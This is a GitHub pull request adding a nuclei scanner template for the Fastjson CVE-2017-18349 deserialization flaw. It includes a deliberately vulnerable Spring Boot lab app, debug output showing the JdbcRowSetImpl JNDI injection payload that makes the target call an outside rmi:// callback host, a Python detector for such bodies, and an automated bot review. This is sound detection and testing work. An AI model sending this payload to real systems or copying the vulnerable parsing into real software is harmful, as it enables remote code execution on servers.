
Added CVE-2017-18349 template #12402


Open: wants to merge 2 commits into base: main

Conversation

@criminalinfluencer commented Jun 17, 2025

Template / PR Information

Recent Updates

  • Simplified matchers to pass automated validation checks
  • Removed generic response matchers to avoid weak-matcher failures
  • Expanded remediation section with detailed security measures
  • Optimized template structure for better reliability

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details

Docker Environment for Testing:

Create Dockerfile:

FROM openjdk:8-jdk-alpine
WORKDIR /app
COPY pom.xml .
COPY src ./src
RUN apk add --no-cache maven && \
    mvn clean package -DskipTests && \
    mv target/*.jar app.jar
EXPOSE 8080
CMD ["java", "-Dserver.address=0.0.0.0", "-jar", "app.jar"]

Create pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.example</groupId>
    <artifactId>vulnerable-fastjson</artifactId>
    <version>1.0.0</version>
    <packaging>jar</packaging>
    
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.1.0.RELEASE</version>
    </parent>
    
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.24</version>
        </dependency>
    </dependencies>
    
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>

Create src/main/java/VulnerableApp.java:

package com.example;

import com.alibaba.fastjson.JSON;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.*;

// Minimal Spring Boot app that hands untrusted request bodies to
// fastjson 1.2.24, whose parser honours the "@type" key (autoType)
// without restriction. This is the behaviour the template probes for.
@SpringBootApplication
@RestController
public class VulnerableApp {
    public static void main(String[] args) {
        SpringApplication.run(VulnerableApp.class, args);
    }

    // Endpoint hit by the template: JSON.parse() instantiates the class
    // named in "@type" and invokes its setters with the supplied values.
    @PostMapping("/json")
    public String parseJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parse(jsonData);
            return "Parsed: " + obj.toString();
        } catch (Exception e) {
            // Setter failures surface here, e.g. "set property error, autoCommit".
            return "Error: " + e.getMessage();
        }
    }

    // Same behaviour through parseObject(), giving a second path to test.
    @PostMapping("/api/json")
    public String parseApiJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parseObject(jsonData);
            return "API Parsed: " + obj.toString();
        } catch (Exception e) {
            return "API Error: " + e.getMessage();
        }
    }

    // Health check used to confirm the container is up before scanning.
    @GetMapping("/")
    public String home() {
        return "Vulnerable Fastjson App Running! CVE-2017-18349";
    }
}

Create src/main/resources/application.properties:

server.address=0.0.0.0
server.port=8080

Build and Run:

docker build -t vulnerable-fastjson .
docker run --rm -p 8080:8080 vulnerable-fastjson

Test Command:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

Debug Output:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.me
[INF] [CVE-2017-18349] Dumped HTTP request for http://127.0.0.1:8080/json

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Content-Length: 173
Accept: application/json
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}
[DBG] [CVE-2017-18349] Dumped HTTP response http://127.0.0.1:8080/json

HTTP/1.1 200 
Connection: close
Content-Length: 37
Content-Type: application/json;charset=UTF-8
Date: Tue, 17 Jun 2025 18:51:37 GMT

Error: set property error, autoCommit

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1232

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

;; ANSWER SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      A       178.128.209.14

;; AUTHORITY SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns1.oast.me.
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns2.oast.me.

;; ADDITIONAL SECTION:
ns1.oast.me.    3600    IN      A       178.128.209.14
ns2.oast.me.    3600    IN      A       178.128.209.14

[CVE-2017-18349] [http] [critical] http://127.0.0.1:8080/json ["185.219.143.11"]

HTTP Request/Response:

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Content-Type: application/json

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Content-Length: 37

Error: set property error, autoCommit

DNS Callback Received:

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
DNS Query: d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me IN A
DNS Response: 178.128.209.14

Claim:
/claim #12387

Additional References:
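The request/response pair and DNS callback above show what the probe looks like on the wire. As an added example (not code from the PR or the nuclei-templates project), here is a small Python detector a defender could run over captured request bodies to flag the Fastjson autoType pattern shown in the debug output: it finds "@type" keys at any depth, extracts the JNDI callback host from a dataSourceName, and falls back to a regex for the lenient syntax Fastjson accepts but strict JSON parsers reject. The flagged-class set, regexes and sample bodies are my own assumptions, constructed for the example.

```python
import json
import re

# Class name from the probe in the PR's debug output; extend with your own
# deny policy (this set is an assumption for the example).
FLAGGED_TYPES = {"com.sun.rowset.JdbcRowSetImpl"}
# JNDI lookups reached through a dataSourceName: scheme://host[:port]/...
JNDI_RE = re.compile(r"""\b(rmi|ldaps?)://([^/\s"']+)""", re.IGNORECASE)
# Fallback for bodies Fastjson accepts but json.loads rejects (single quotes,
# unquoted keys); pulls the "@type" value straight out of the text.
TYPE_RE = re.compile(r"""["']?@type["']?\s*:\s*["']([\w.$]+)["']""")


def _walk(node):
    """Yield every (key, value) pair of a parsed JSON tree, depth first."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield key, value
            yield from _walk(value)
    elif isinstance(node, list):
        for item in node:
            yield from _walk(item)


def inspect_body(body: str) -> dict:
    """Classify one request body: the @type names seen, the JNDI callback
    hosts seen, and whether either warrants an alert."""
    try:
        tree = json.loads(body)
    except ValueError:
        types = TYPE_RE.findall(body)  # lenient-syntax fallback
    else:
        types = [v for k, v in _walk(tree) if k == "@type" and isinstance(v, str)]
    # Strip any port so the host can go straight into a blocklist/IoC feed.
    hosts = [h.split(":")[0].lower() for _, h in JNDI_RE.findall(body)]
    flagged = [t for t in types if t in FLAGGED_TYPES]
    return {"suspicious": bool(flagged or hosts), "types": types, "jndi_hosts": hosts}


# Constructed sample bodies: the probe shown in the PR and a benign request.
PROBE = ('{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": '
         '"rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z", '
         '"autoCommit": true}')
BENIGN = '{"user": "alice", "homepage": "https://example.com/"}'

if __name__ == "__main__":
    for body in (PROBE, BENIGN):
        print(inspect_body(body))
```

Because the check keys on the "@type" key and the JNDI scheme rather than on a specific callback domain, it also catches the same probe pointed at a different interactsh server.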

@princechaddha (Member)

Automated PR Review (Experimental)


Thank you for your contribution! You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

Required Fixes

  • Fix matcher location for risk of false positives: Consider using a response-based matcher to minimize false positives, especially for the payloads being sent.
  • Update tags: Make sure you include rce in the correct format (e.g., rce should be in lower case); consistent formatting helps with tagging and searching.

Other Suggestions

  • The description section effectively conveys the necessary information about the vulnerability. Consider expanding the remediation part with more context or details on best practices beyond just updating the Fastjson library.
  • Ensure that the stop-at-first-match: true is placed appropriately if you want rapid feedback on responses. It’s good practice, particularly when multiple payloads might yield quick checks.
  • The interactsh usage is good for testing purposes. Ensure that it is clearly communicated in the documentation so users understand they have to set up their interactsh server.

This is a great addition to the templates repository, and I appreciate your effort in maintaining high standards!

Note: I am an AI Template bot which is still experimental, and the team will review the PR shortly.

@DhiyaneshGeek added the "Status: In Progress" label on Jun 23, 2025
Labels: 🙋 Bounty claim; Status: In Progress
3 participants